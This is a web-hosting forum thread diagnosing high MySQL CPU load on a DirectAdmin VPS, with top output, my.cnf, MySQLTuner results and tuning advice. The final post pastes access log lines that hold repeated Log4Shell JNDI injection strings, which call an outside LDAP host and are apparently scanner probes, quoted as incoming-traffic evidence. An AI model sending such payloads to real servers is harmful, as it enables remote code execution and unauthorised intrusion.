MYSQL high CPU usage

mikajaxxx

Hi everyone, I get this error:

Code:
Warning: The system load average is 74.39

This is an automated message notifying you that the 5 minute load average on your system is 74.39.

This has exceeded the 10 threshold.

One Minute      - 36.05
Five Minutes    - 74.39
Fifteen Minutes - 47.64

top - 16:59:02 up 31 min,  1 user,  load average: 36.05, 74.39, 47.64
Tasks: 246 total,   5 running, 241 sleeping,   0 stopped,   0 zombie
%Cpu(s): 72.7 us, 24.2 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  3.0 si,  0.0 st
KiB Mem :  3781860 total,  1254872 free,  1817604 used,   709384 buff/cache
KiB Swap:  4194300 total,  3338200 free,   856100 used.  1725372 avail Mem
  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
 6013 mysql     20   0 1604344 332272   9032 S  68.8  8.8   0:24.21 /usr/sbin/mysqld --daemonize --pid-file=/var/run/mysqld/mysqld.pid
 4579 vipgift   20   0  317424  57684   4248 R  43.8  1.5   0:18.24 lsphp:domains/vipgiftcard.net/private_html/index.phto_avoid_overwrite_important_env
 6067 valatan   20   0  300276  50444   5016 R  37.5  1.3   0:10.73 lsphp:tan/domains/valatan.com/private_html/index.ph_room_to_avoid_overwrite_important_env
 5038 valatan   20   0  302324  53748   5032 R  31.2  1.4   0:08.78 lsphp:tan/domains/valatan.com/private_html/index.ph_room_to_avoid_overwrite_important_env
 6128 root      20   0   58412   2196   1484 R  12.5  0.1   0:00.02 /usr/bin/top -c -b -n 1
 1197 root      20   0 1133968   8216   2724 S   6.2  0.2   0:05.45 /usr/local/directadmin/directadmin

The main threats are related to "/usr/sbin/mysqld --daemonize --pid-file=/var/run/mysqld/mysqld.pid" and also "/private_html/index.ph_room_to_avoid_overwrite_important_env", which I have no idea about!
Could anyone help me reduce the CPU load?


directadmin: 1.63.3
webserver : openlitespeed
 
Any time I see high MySQL usage it's a good idea to check your optimizations. I use this tool:


Also, looks like your VM (assuming VM) only has 4gb ram, could be undersized for your load. (I never build a hosting environment with less than 16gb ram.)

It would be good to check the swappiness of your Linux install, as I see free RAM but swap is still being used. I always set mine to 0, so that RAM needs to be exhausted before any swapping happens; many installs default to 60. Check this article:


For the "/private_html/index.ph_room_to_avoid_overwrite_important_env" reference, if you didn't build the site, it wouldn't hurt to check it out and see what it does, or check with the developer.
 
my.cnf settings to check, maybe SEO bots to block (had this years ago with several aggressive SEO spiders)
 
> my.cnf settings to check, maybe SEO bots to block (had this years ago with several aggressive SEO spiders)

Hello,
I am not a pro; could you please be more specific?
Here is etc/my.cnf:

Code:
# For advice on how to change settings please see
# http://dev.mysql.com/doc/refman/5.7/en/server-configuration-defaults.html

[mysqld]
max_allowed_packet=64M
local-infile = 0
#
# Remove leading # and set to the amount of RAM for the most important data
# cache in MySQL. Start at 70% of total RAM for dedicated server, else 10%.
# innodb_buffer_pool_size = 128M
#
# Remove leading # to turn on a very important data integrity option: logging
# changes to the binary log between backups.
# log_bin
#
# Remove leading # to set options mainly useful for reporting servers.
# The server defaults are faster for transactions and fast SELECTs.
# Adjust sizes as needed, experiment to find the optimal values.
# join_buffer_size = 128M
# sort_buffer_size = 2M
# read_rnd_buffer_size = 2M
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock

# Disabling symbolic-links is recommended to prevent assorted security risks
symbolic-links=0

log-error=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid

Also, the last mysqld.log:

Code:
2021-12-15T00:00:21.702063Z 0 [Note] InnoDB: page_cleaner: 1000ms intended loop took 6227ms. The settings might not be optimal. (flushed=2001 and evicted=0, during the time.)
2021-12-15T00:00:44.137469Z 0 [Note] InnoDB: page_cleaner: 1000ms intended loop took 5284ms. The settings might not be optimal. (flushed=0 and evicted=970, during the time.)
2021-12-15T00:00:52.655294Z 0 [Note] InnoDB: page_cleaner: 1000ms intended loop took 4454ms. The settings might not be optimal. (flushed=687 and evicted=631, during the time.)
2021-12-15T00:01:45.917737Z 0 [Note] InnoDB: page_cleaner: 1000ms intended loop took 5115ms. The settings might not be optimal. (flushed=1326 and evicted=0, during the time.)
2021-12-15T00:01:56.666613Z 0 [Note] InnoDB: page_cleaner: 1000ms intended loop took 4446ms. The settings might not be optimal. (flushed=2001 and evicted=0, during the time.)
2021-12-15T00:02:03.862250Z 0 [Note] InnoDB: page_cleaner: 1000ms intended loop took 5481ms. The settings might not be optimal. (flushed=2001 and evicted=0, during the time.)
2021-12-15T00:03:58.902037Z 19988 [Note] Access denied for user 'da_admin'@'localhost' (using password: YES)
2021-12-15T00:14:24.685368Z 20814 [Note] Access denied for user 'da_admin'@'localhost' (using password: YES)
2021-12-15T00:18:01.549917Z 0 [Note] InnoDB: page_cleaner: 1000ms intended loop took 6353ms. The settings might not be optimal. (flushed=2001 and evicted=0, during the time.)
2021-12-15T00:20:31.450842Z 0 [Note] InnoDB: page_cleaner: 1000ms intended loop took 6601ms. The settings might not be optimal. (flushed=2001 and evicted=0, during the time.)
2021-12-15T00:25:04.723089Z 21881 [Note] Access denied for user 'da_admin'@'localhost' (using password: YES)

Also, I already followed this article, but still high CPU load!
 
> For the "/private_html/index.ph_room_to_avoid_overwrite_important_env" reference, if you didn't build the site, it wouldn't hurt to check it out and see what it does, or check with the developer.

There is no such file! private_html is a symlink to public_html, but I didn't find such a file on the server.
 
Did you check your swappiness and check with mysqltuner? mysqltuner will give you suggestions on what you need to change in your my.cnf
 
> Did you check your swappiness and check with mysqltuner? mysqltuner will give you suggestions on what you need to change in your my.cnf

Yeah, I set swappiness to 1. I never used mysqltuner. First I must go for a full backup.
 
I installed mysqltuner; here is the output:
Code:
 >>  MySQLTuner 1.8.5 - Major Hayden <[email protected]>
 >>  Bug reports, feature requests, and downloads at http://mysqltuner.pl/
 >>  Run with '--help' for additional options and output filtering

[--] Skipped version check for MySQLTuner script
[OK] Currently running supported MySQL version 5.7.35
[OK] Operating on 64-bit architecture

-------- Log file Recommendations ------------------------------------------------------------------
[OK] Log file /var/log/mysqld.log exists
[--] Log file: /var/log/mysqld.log(370K)
[OK] Log file /var/log/mysqld.log is not empty
[OK] Log file /var/log/mysqld.log is smaller than 32 Mb
[OK] Log file /var/log/mysqld.log is readable.
[!!] /var/log/mysqld.log contains 250 warning(s).
[!!] /var/log/mysqld.log contains 62 error(s).
[--] 32 start(s) detected in /var/log/mysqld.log
[--] 1) 2021-12-14T16:57:55.837935Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 2) 2021-12-14T16:27:42.467565Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 3) 2021-12-14T14:56:32.661655Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 4) 2021-12-14T14:47:35.464868Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 5) 2021-12-14T14:40:47.027137Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 6) 2021-12-14T14:39:28.655112Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 7) 2021-12-14T12:36:31.048015Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 8) 2021-12-14T12:35:44.865593Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 9) 2021-12-14T12:04:43.328892Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 10) 2021-12-14T11:26:01.693063Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 23 shutdown(s) detected in /var/log/mysqld.log
[--] 1) 2021-12-14T16:57:52.964860Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 2) 2021-12-14T16:25:53.328006Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 3) 2021-12-14T14:54:44.945343Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 4) 2021-12-14T14:47:32.931880Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 5) 2021-12-14T14:40:01.792113Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 6) 2021-12-14T14:38:06.992349Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 7) 2021-12-14T12:36:29.082516Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 8) 2021-12-14T12:34:41.111645Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 9) 2021-12-14T12:04:40.596363Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 10) 2021-12-14T11:25:59.607090Z 0 [Note] /usr/sbin/mysqld: Shutdown complete

-------- Storage Engine Statistics -----------------------------------------------------------------
[--] Status: +ARCHIVE +BLACKHOLE +CSV -FEDERATED +InnoDB +MEMORY +MRG_MYISAM +MyISAM +PERFORMANCE_SCHEMA
[--] Data in MyISAM tables: 39.3M (Tables: 665)
[--] Data in InnoDB tables: 1.4G (Tables: 7818)
[--] Data in MEMORY tables: 0B (Tables: 24)
[OK] Total fragmented tables: 0

-------- Analysis Performance Metrics --------------------------------------------------------------
[--] innodb_stats_on_metadata: OFF
[OK] No stat updates during querying INFORMATION_SCHEMA.

-------- Security Recommendations ------------------------------------------------------------------
[OK] There are no anonymous accounts for any database users
[OK] All database users have passwords assigned
[!!] There is no basic password file list!

-------- CVE Security Recommendations --------------------------------------------------------------
[OK] NO SECURITY CVE FOUND FOR YOUR VERSION

-------- Performance Metrics -----------------------------------------------------------------------
[--] Up for: 16h 6m 10s (19M q [339.716 qps], 49K conn, TX: 28G, RX: 6G)
[--] Reads / Writes: 99% / 1%
[--] Binary logging is disabled
[--] Physical Memory     : 3.6G
[--] Max MySQL memory    : 9.8G
[--] Other process memory: 0B
[--] Total buffers: 169.0M global + 65.1M per thread (151 max threads)
[--] P_S Max memory usage: 72B
[--] Galera GCache Max memory usage: 0B
[!!] Maximum reached memory usage: 7.0G (195.02% of installed RAM)
[!!] Maximum possible memory usage: 9.8G (270.84% of installed RAM)
[!!] Overall possible memory usage with other process exceeded memory
[OK] Slow queries: 0% (0/19M)
[OK] Highest usage of available connections: 71% (108/151)
[OK] Aborted connections: 0.05%  (25/49755)
[!!] name resolution is active : a reverse name resolution is made for each new connection and can reduce performance
[OK] Query cache is disabled by default due to mutex contention on multiprocessor machines.
[OK] Sorts requiring temporary tables: 0% (86 temp sorts / 4M sorts)
[!!] Joins performed without indexes: 143942
[OK] Temporary tables created on disk: 2% (137K on disk / 5M total)
[OK] Thread cache hit rate: 92% (3K created / 49K connections)
[OK] Table cache hit rate: 96% (45M hits / 46M requests)
[!!] table_definition_cache(1400) is lower than number of tables(8786)
[OK] Open file limit used: 0% (182/655K)
[OK] Table locks acquired immediately: 99% (299K immediate / 299K locks)

-------- Performance schema ------------------------------------------------------------------------
[--] Memory used by P_S: 72B
[--] Sys schema is installed.

-------- ThreadPool Metrics ------------------------------------------------------------------------
[--] ThreadPool stat is disabled.

-------- MyISAM Metrics ----------------------------------------------------------------------------
[!!] Key buffer used: 21.4% (1.7M used / 8.0M cache)
[OK] Key buffer size / total MyISAM indexes: 8.0M/5.9M
[OK] Read Key buffer hit rate: 97.7% (2M cached / 47K reads)
[!!] Write Key buffer hit rate: 53.5% (2K cached / 1K writes)

-------- InnoDB Metrics ----------------------------------------------------------------------------
[--] InnoDB is enabled.
[--] InnoDB Thread Concurrency: 0
[OK] InnoDB File per table is activated
[!!] InnoDB buffer pool / data size: 128.0M/1.4G
[!!] Ratio InnoDB log file size / InnoDB Buffer pool size (75 %): 48.0M * 2/128.0M should be equal to 25%
[OK] InnoDB buffer pool instances: 1
[--] Number of InnoDB Buffer Pool Chunk : 1 for 1 Buffer Pool Instance(s)
[OK] Innodb_buffer_pool_size aligned with Innodb_buffer_pool_chunk_size & Innodb_buffer_pool_instances
[OK] InnoDB Read buffer efficiency: 99.97% (2146231527 hits/ 2146782124 total)
[!!] InnoDB Write Log efficiency: 49.85% (71519 hits/ 143477 total)
[OK] InnoDB log waits: 0.00% (0 waits / 71958 writes)

-------- Aria Metrics ------------------------------------------------------------------------------
[--] Aria Storage Engine not available.

-------- TokuDB Metrics ----------------------------------------------------------------------------
[--] TokuDB is disabled.

-------- XtraDB Metrics ----------------------------------------------------------------------------
[--] XtraDB is disabled.

-------- Galera Metrics ----------------------------------------------------------------------------
[--] Galera is disabled.

-------- Replication Metrics -----------------------------------------------------------------------
[--] Galera Synchronous replication: NO
[--] No replication slave(s) for this server.
[--] Binlog format: ROW
[--] XA support enabled: ON
[--] Semi synchronous replication Master: Not Activated
[--] Semi synchronous replication Slave: Not Activated
[--] This is a standalone server

-------- Recommendations ---------------------------------------------------------------------------
General recommendations:
    Check warning line(s) in /var/log/mysqld.log file
    Check error line(s) in /var/log/mysqld.log file
    MySQL was started within the last 24 hours - recommendations may be inaccurate
    Reduce your overall MySQL memory footprint for system stability
    Dedicate this server to your database for highest performance.
    Configure your accounts with ip or subnets only, then update your configuration with skip-name-resolve=1
    We will suggest raising the 'join_buffer_size' until JOINs not using indexes are found.
             See https://dev.mysql.com/doc/internals/en/join-buffer-size.html
             (specially the conclusions at the bottom of the page).
    Before changing innodb_log_file_size and/or innodb_log_files_in_group read this: https://bit.ly/2TcGgtU
Variables to adjust:
  *** MySQL's maximum memory usage is dangerously high ***
  *** Add RAM before increasing MySQL buffer variables ***
    join_buffer_size (> 256.0K, or always use indexes with JOINs)
    table_definition_cache(1400) > 8786 or -1 (autosizing if supported)
    innodb_buffer_pool_size (>= 1.4G) if possible.
    innodb_log_file_size should be (=16M) if possible, so InnoDB total log files size equals to 25% of buffer pool size.
 
Add these three lines to my.cnf:
innodb_buffer_pool_size=1G
table_definition_cache=9000
skip-name-resolve
 
This is concerning:

[!!] Maximum reached memory usage: 7.0G (195.02% of installed RAM)
[!!] Maximum possible memory usage: 9.8G (270.84% of installed RAM)

VM/machine needs more ram. There's going to be more issues in the future with performance. Looking at the log output you probably need 16GB of ram for it to run without swapping. Other changes already suggested will help, but more ram is needed.
 
The main problem is about CPU, not RAM. I have another VPS run by CyberPanel with just 1 GB RAM!!!!! I have around 15 websites on it with no problem at all, and everything is fast enough.
On my current DirectAdmin VPS I have 4 GB and just 12 websites! Weird situation! Also, the problem showed up recently, maybe in the last two weeks!
 
> VM/machine needs more ram.

It's due to "+ 65.1M per thread" and 108 opened threads, but it's just allocated memory due to max_allowed_packet=64M; it's not really used.
He has an overloaded CPU and 1700 MB free RAM. So first of all, max_allowed_packet can be reduced to 32, but that's not necessary yet. He also must configure some type of caching (opcache, lscache) and check the access/error logs - maybe this is just a primitive DDoS or bots, and it can be solved by CSF.
 
> It's due to "+ 65.1M per thread" and 108 opened threads, but it's just allocated memory due to max_allowed_packet=64M; it's not really used.
> He has an overloaded CPU and 1700 MB free RAM. So first of all, max_allowed_packet can be reduced to 32, but that's not necessary yet. He also must configure some type of caching (opcache, lscache) and check the access/error logs - maybe this is just a primitive DDoS or bots, and it can be solved by CSF.

Yeah, the RAM is not the issue! I used mytop for monitoring MySQL; nothing unusual was reported. The queries were really low, but "/usr/sbin/mysqld --daemonize --pid-file=/var/run/mysqld/mysqld.pid" is the main problem. I don't know how that could have an effect on the CPU!
Also, "/private_html/index.ph_room_to_avoid_overwrite_important_env" is strange to me!
 
From DirectAdmin -> Log Viewer / Apache access log:
Code:
65.227.43.42 - - [13/Dec/2021:02:35:22 +0000] "HEAD / HTTP/1.1" 200 0 "-" "-"
194.5.73.6 - - [14/Dec/2021:03:02:52 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-f79e92a1e96c9e8efee080209ed03a04_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-f79e92a1e96c9e8efee080209ed03a04_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-f79e92a1e96c9e8efee080209ed03a04_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-f79e92a1e96c9e8efee080209ed03a04_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:03:02:52 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-f79e92a1e96c9e8efee080209ed03a04_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-f79e92a1e96c9e8efee080209ed03a04_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-f79e92a1e96c9e8efee080209ed03a04_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-f79e92a1e96c9e8efee080209ed03a04_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:07:46:01 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8c833a4ad4bc7edd61b4da6c5983e6ee_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8c833a4ad4bc7edd61b4da6c5983e6ee_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8c833a4ad4bc7edd61b4da6c5983e6ee_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-8c833a4ad4bc7edd61b4da6c5983e6ee_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:07:46:01 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8c833a4ad4bc7edd61b4da6c5983e6ee_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8c833a4ad4bc7edd61b4da6c5983e6ee_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8c833a4ad4bc7edd61b4da6c5983e6ee_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-8c833a4ad4bc7edd61b4da6c5983e6ee_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:08:24:09 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-02b6c121209817cd81fe241e1db94311_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-02b6c121209817cd81fe241e1db94311_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-02b6c121209817cd81fe241e1db94311_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-02b6c121209817cd81fe241e1db94311_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:08:24:09 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-02b6c121209817cd81fe241e1db94311_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-02b6c121209817cd81fe241e1db94311_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-02b6c121209817cd81fe241e1db94311_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-02b6c121209817cd81fe241e1db94311_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:15:31:39 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-4c082834ea29bd1a49e31d25d4be02f9_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-4c082834ea29bd1a49e31d25d4be02f9_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-4c082834ea29bd1a49e31d25d4be02f9_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-4c082834ea29bd1a49e31d25d4be02f9_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:15:31:40 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-4c082834ea29bd1a49e31d25d4be02f9_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-4c082834ea29bd1a49e31d25d4be02f9_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-4c082834ea29bd1a49e31d25d4be02f9_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-4c082834ea29bd1a49e31d25d4be02f9_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:18:38:23 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-5c378e4a6981691c21cc2d5899c5fe2f_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-5c378e4a6981691c21cc2d5899c5fe2f_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-5c378e4a6981691c21cc2d5899c5fe2f_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-5c378e4a6981691c21cc2d5899c5fe2f_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:18:38:23 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-5c378e4a6981691c21cc2d5899c5fe2f_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-5c378e4a6981691c21cc2d5899c5fe2f_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-5c378e4a6981691c21cc2d5899c5fe2f_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-5c378e4a6981691c21cc2d5899c5fe2f_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:18:57:18 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ad215cf7d93ea8b848e97bd7dd6c7fa3_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ad215cf7d93ea8b848e97bd7dd6c7fa3_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ad215cf7d93ea8b848e97bd7dd6c7fa3_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-ad215cf7d93ea8b848e97bd7dd6c7fa3_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:18:57:18 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ad215cf7d93ea8b848e97bd7dd6c7fa3_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ad215cf7d93ea8b848e97bd7dd6c7fa3_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ad215cf7d93ea8b848e97bd7dd6c7fa3_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-ad215cf7d93ea8b848e97bd7dd6c7fa3_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [15/Dec/2021:01:16:02 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-a81810a62cfa07226b9f37b89d844f8a_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-a81810a62cfa07226b9f37b89d844f8a_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-a81810a62cfa07226b9f37b89d844f8a_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-a81810a62cfa07226b9f37b89d844f8a_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [15/Dec/2021:01:16:02 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-a81810a62cfa07226b9f37b89d844f8a_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-a81810a62cfa07226b9f37b89d844f8a_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-a81810a62cfa07226b9f37b89d844f8a_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-a81810a62cfa07226b9f37b89d844f8a_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [15/Dec/2021:01:20:17 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ce6f5efe524104fe943f18f451e0825a_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ce6f5efe524104fe943f18f451e0825a_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ce6f5efe524104fe943f18f451e0825a_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-ce6f5efe524104fe943f18f451e0825a_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [15/Dec/2021:01:20:17 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ce6f5efe524104fe943f18f451e0825a_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ce6f5efe524104fe943f18f451e0825a_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ce6f5efe524104fe943f18f451e0825a_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-ce6f5efe524104fe943f18f451e0825a_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
20.205.59.237 - - [15/Dec/2021:10:43:40 +0000] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2931.79 Safari/537.36"
